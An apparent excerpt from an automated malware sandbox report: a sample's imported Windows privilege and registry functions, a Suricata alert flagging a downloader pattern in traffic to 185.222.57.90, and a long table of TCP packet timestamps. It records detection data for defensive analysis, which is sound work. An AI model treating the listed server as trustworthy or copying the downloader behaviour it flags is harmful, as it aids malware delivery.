                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-18T18:19:35.134009+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.753200185.222.57.9080TCP

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 18, 2024 18:19:34.253560066 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:34.258728027 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:34.258945942 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:34.261518955 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:34.266555071 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.133896112 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.133910894 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.133924007 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134008884 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.134015083 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134021997 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134036064 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134042978 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134119034 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.134119034 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.134326935 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134334087 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134346962 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.134388924 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.139009953 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.139132977 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.139199018 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.252713919 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.252746105 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.252753973 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.252765894 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.252774000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.252821922 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.252902985 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253009081 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253103018 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253112078 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253191948 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253237963 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253295898 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253304005 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253312111 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253335953 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253357887 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.253413916 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253421068 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.253473997 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.254112005 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.254163980 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.254182100 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.254188061 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.254230976 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.367937088 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.367955923 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.367969990 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368037939 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368091106 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368103027 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368196964 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368273020 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.368273020 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.368592024 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368660927 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368674040 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368700981 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.368721962 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.368753910 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.368796110 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368803978 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368815899 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.368858099 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.369540930 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.369555950 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.369611025 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.486614943 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486656904 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486665010 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486707926 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.486802101 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.486967087 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486974001 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486982107 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.486988068 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.487021923 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.487054110 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.489475965 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489484072 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489495993 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489502907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489510059 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489516020 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489528894 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489535093 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.489545107 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.489598989 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.533550978 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.533623934 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.533701897 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.601967096 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.601996899 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602005005 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602051973 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602051973 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602061987 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602068901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602145910 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602194071 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602250099 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602255106 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602261066 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602310896 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602540016 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602596045 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602607012 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602648020 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.602746964 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602752924 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.602806091 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.608319998 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.608347893 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.608388901 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.608417988 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.647468090 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.647478104 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.647571087 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717279911 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717360020 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717367887 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717381001 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717448950 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717494011 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717514992 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717550993 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717571020 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717573881 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717597961 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717636108 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717849970 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717868090 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717889071 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.717902899 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.717936039 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.718013048 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.718031883 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.718071938 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.718101978 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.718139887 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.723608971 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.723643064 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.723668098 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.723694086 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.762810946 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.762882948 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.763498068 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.763592958 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.832532883 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832597971 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832617044 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832626104 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.832678080 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.832695961 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832731962 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832751036 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.832750082 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.832781076 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.832803965 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833054066 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833072901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833090067 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833116055 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833148956 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833148956 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833348036 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833388090 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833421946 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833451033 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833477020 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833502054 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833523035 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.833558083 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.833575964 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.838942051 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.838963032 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.838980913 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.839006901 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.839042902 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.839042902 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.878618956 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.878645897 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.878721952 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.947684050 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947736025 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.947777987 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947789907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947796106 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947923899 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947973967 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947984934 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.947999001 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.948016882 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.948308945 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948345900 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948359966 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948388100 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.948647976 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948690891 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.948715925 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948724031 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.948760986 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.949058056 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.949064016 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.949101925 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.954233885 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.954246998 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.954261065 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.954303026 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.954343081 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.995352983 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.995423079 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:35.995482922 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:35.995537043 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.065829039 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.065846920 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.065857887 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.065969944 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066108942 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066121101 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066133022 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066159964 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066179991 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066246986 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066287994 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066615105 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066627979 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066634893 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066644907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066694975 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066725016 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066783905 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066797018 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.066832066 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.066862106 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.071672916 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.071727991 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.071835041 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.071847916 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.071886063 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.071918964 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.140077114 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.140091896 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.140105963 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.140266895 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.180969000 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181016922 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181092024 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181107044 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181123018 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181166887 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181252956 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181282997 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181319952 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181365967 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181417942 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181443930 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181524038 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181669950 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181704998 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181756973 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181766033 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181801081 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181811094 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181837082 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.181873083 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.181974888 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.182158947 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.182193995 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.182230949 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.182250977 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.182312965 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.186480999 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.186578035 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.186669111 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.186695099 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.186714888 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.186759949 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.186842918 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.224874973 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.224891901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.224940062 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.224977970 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.225107908 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.225198984 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.294881105 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.294898987 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.294913054 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.294924974 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295017958 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295063972 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.295085907 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295165062 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295245886 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295258045 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295269966 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295289993 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.295321941 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.295378923 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.295738935 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295937061 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295950890 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295979977 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.295991898 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.296031952 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.296122074 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.300328970 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300425053 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300437927 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.300498962 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.300542116 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341192007 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341263056 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341339111 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341368914 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341394901 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341430902 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341470003 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.341528893 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.341528893 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.344232082 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410474062 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410510063 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410521030 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410649061 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410757065 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410768986 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410782099 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410797119 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.410859108 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.410859108 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411092997 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411117077 CET8053200185.222.57.90192.168.2.7
                                          Nov 18, 2024 18:19:36.411147118 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411179066 CET5320080192.168.2.7185.222.57.90
                                          Nov 18, 2024 18:19:36.411408901 CET8053200185.222.57.90192.168.2.7
